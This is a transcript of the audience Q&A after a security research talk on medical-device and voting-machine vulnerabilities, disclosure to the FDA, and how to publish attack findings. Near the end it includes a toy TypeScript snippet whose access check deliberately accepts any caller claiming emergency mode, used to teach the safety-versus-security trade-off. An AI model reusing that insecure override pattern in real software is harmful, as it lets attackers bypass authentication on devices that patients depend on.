So I didn't hear the second part of your question. There were two questions about the medical device work; the first was whether it has been published, and the answer is yes. My colleague Ben Ransford presented the paper at the Oakland security conference in May of this year, and if you Google us and find our website, you can get a copy of the paper there. We've talked with the FDA, and also with device manufacturers, about how to integrate them and about what the types of solutions to this might be. As for pathology or post-mortem uses: no one has expressed interest in that to us directly. There were definitely lots of people interested in this work; I think we're still a little early. We've been talking with lots of other academics who are interested in understanding how to move into security for medical devices. I also know some people in industry are doing things like pen testing against wireless medical devices (they can't publish it because it's under NDA), but we don't have any strong collaborations to report on yet. Yeah, thank you.

Ah, so the question was: in academia you do have a lot of flexibility, but where does our funding come from, and how does that affect things? I should mention that I'm in my second year on the faculty at the University of Washington, and that's relevant because when people become new professors, they're given a startup budget that they can use as they see fit to further their research.
So for a lot of the work so far, like the medical devices and some of the other things we've been talking about, the funding isn't restricted to any particular agency; other work that I didn't talk about today was funded by the NSF. So can we use your startup funds to buy a sports car to hack OnStar? Good question. Okay, we have 10 minutes left. Only if I get to drive it.

Ah, I couldn't quite hear the question; it was: how easy would it be to actually obtain a voting machine? It turns out they're not that easy to obtain. The Princeton team, after our study came out, did obtain one and then ran some attacks against it. We were trying to figure out how to obtain one ourselves, but it was really not that easy to come by. Yeah, they haven't been. The Princeton team's case was very interesting, because a volunteer gave them one, and it was a sort of cloak-and-dagger thing where they were quite literally told: come to New York, have a taxicab driver drive you to this alleyway, beep three times, be wearing a trench coat, and we will hand you a briefcase. And that's pretty much exactly what happened: they got the briefcase, and in it was a voting machine. It was not illegal, and this was one of the things where, before they did it, they contacted the Princeton legal team and ethics team to ask: are we allowed to do this? And the legal and ethics team said that all the legal and ethical questions here are borne by the people giving it to you, not by you. They were in fact asked: please don't break the machine. So it was used for a while and then returned to where it came from. And it'll be used in the following election. No, just joking. So, okay, yep.

Yep. Yeah, so that's a very good question, and it turns out there's actually a spectrum. When I was talking about what the research needs to have, I think there was a bullet on the slide saying you can't just publish the attacks themselves; they have to speak to some bigger-picture issues. One of those is focusing on lessons, one is focusing on defenses, and one is focusing on the societal impact. For our voting paper, I truly believe the scale tipped toward this being an important societal issue; there was a lot of work in it, but the technical depth was not the same as in our work on trying to improve security for medical devices. But to pop back up a level: you're right, there are a lot of systems out there that do very stupid things. If you wanted to submit a paper on one of them to a security venue, please let me know; I, or other people in the security community, will be more than happy to provide guidance on how to frame it. Oftentimes, if the attack is just that stupid, the community might not accept it as a scientific publication. But if you can wrap it in a societal context, or talk about the defenses and why some of the natural defenses didn't work, or about what led to this and how the problem might be broader than just one particular application, then that may be a paper.
Yeah, I mean, these days, finding a buffer overflow in product X is not interesting science; it's been done. But I would argue that if you found something, write it up as a paper and send it to the people whose product you broke. If it's a PDF with the pretty LaTeX fonts and an abstract and all of that, and you say, "I'm going to be submitting this somewhere, and I would love to work with you, company X," that's going to grab their attention in a way nothing else would, and they're going to be far more likely to cooperate with you. And if, gosh darn, you only end up publishing that paper on your own website because it didn't get accepted, that's how you start developing your own individual cred: you found X, you found Y. Following these conventions is kind of like dressing the right way. If you start dressing like an academic in the things you write, you'll start getting people who say, I'll help you. You get your results X and Y, and you might put three of them together into, as Yoshi said, a societal thing, or a study of how people respond to reports. That would be the sort of paper you could do.

So I think we have time for at least two more questions: first over there, and then this one next. Yeah, so the question was about our medical device work and who we talked to. I won't summarize each part of the question; I'll just start answering. The first thing is that we definitely did engage the FDA before we published this work. The FDA is the US Food and Drug Administration; they're the one governing body in the United States with an industry-wide perspective on the issues affecting medicine in general. We worked with them primarily because we felt that the issues we uncovered, while we focused on one device, could potentially be much broader than that. It wasn't about saying, just fix this one product; really, the FDA and the rest of the industry need to focus on this problem as a whole. So we did work with them, and I think they were very receptive. We've now had meetings with the FDA and with the medical device manufacturers, and I think they understand that this is an issue. The big question is: what do security and privacy actually mean for these devices, when you have to trade off security against safety?

I'll mention a brief example for you to think about. Say I want to secure a pacemaker or an ICD. Maybe I'll put some cryptographic keys on it and only allow it to talk to authorized equipment, like your prescribing doctor's programmer. Then what happens when you're in a foreign city, you get into an accident, and the people in the ambulance or at the emergency room need to immediately turn off your device or change its settings? What do they do? Well, they need a back door, and they need that back door for safety. But why couldn't an adversary use that same back door? That's one of the challenges for medical devices that I think will be particularly hard to work through. But I hope that was okay.
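As a toy illustration of that tension (not any real device's protocol; every name here is invented), consider what an emergency override does to an otherwise key-protected command check:

```typescript
// Toy sketch of the security/safety trade-off; not a real device's logic.
// Commands are normally accepted only with the prescribing doctor's key.

type Command = { action: "reprogram" | "disable" };

const AUTHORIZED_KEY = "prescribing-doctor-key"; // illustrative secret

function acceptCommand(cmd: Command, key?: string, emergencyMode = false): boolean {
  if (key === AUTHORIZED_KEY) {
    return true; // the normal, cryptographically gated path
  }
  if (emergencyMode) {
    // The safety back door: an unknown emergency room in a foreign city
    // must be able to disable or reprogram the device without the key...
    return true;
  }
  return false;
}

// ...but the device cannot distinguish a genuine emergency from an
// adversary who simply asserts the same emergency mode:
console.log(acceptCommand({ action: "disable" }, undefined, true)); // true either way
```

Any mechanism that lets an unauthenticated party in for safety reasons is, by construction, available to an attacker too; that is the trade-off being pointed at here.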
And in the minute or two we have left: I think we agree completely. The comment was about how you get people aware of this, and he suggested legislation and insurance. I have been saying recently that we didn't get people to wear seat belts at a rate above 15 to 20 percent of the population, even though the danger, your face going into a piece of glass, is really easy to imagine, until there were laws and fines. And the insurance industry created building safety codes; those aren't laws, but you can't get insurance on a building unless you meet the codes. That's an awful lot of how we will ultimately get these things done, because people are stupid. I mean, you know, it's the second most prevalent element in the universe. So, I think we're being waved at that we're out of time, okay? Our Q&A room is room 115, so please come to room 115 with us.